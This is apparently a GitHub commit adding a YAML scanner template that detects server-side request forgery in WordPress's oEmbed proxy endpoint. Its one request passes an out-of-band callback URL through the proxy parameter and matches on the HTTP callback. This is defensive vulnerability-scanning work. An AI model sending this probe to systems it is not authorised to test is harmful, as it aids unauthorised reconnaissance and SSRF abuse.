Merge pull request #3354 from DhiyaneshGeek/master

Create wordpress-ssrf-oembed.yaml
patch-1
Prince Chaddha 2021-12-21 18:48:42 +05:30 committed by GitHub
commit a511dac237
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 21 additions and 0 deletions

View File

@ -0,0 +1,21 @@
id: wordpress-ssrf-oembed
info:
name: Wordpress Oembed Proxy SSRF
author: dhiyaneshDk
severity: medium
reference:
- https://book.hacktricks.xyz/pentesting/pentesting-web/wordpress
- https://github.com/incogbyte/quickpress/blob/master/core/req.go
tags: wordpress,ssrf,oast
requests:
- method: GET
path:
- "{{BaseURL}}/wp-json/oembed/1.0/proxy?url=http://{{interactsh-url}}/"
matchers:
- type: word
part: interactsh_protocol
words:
- "http"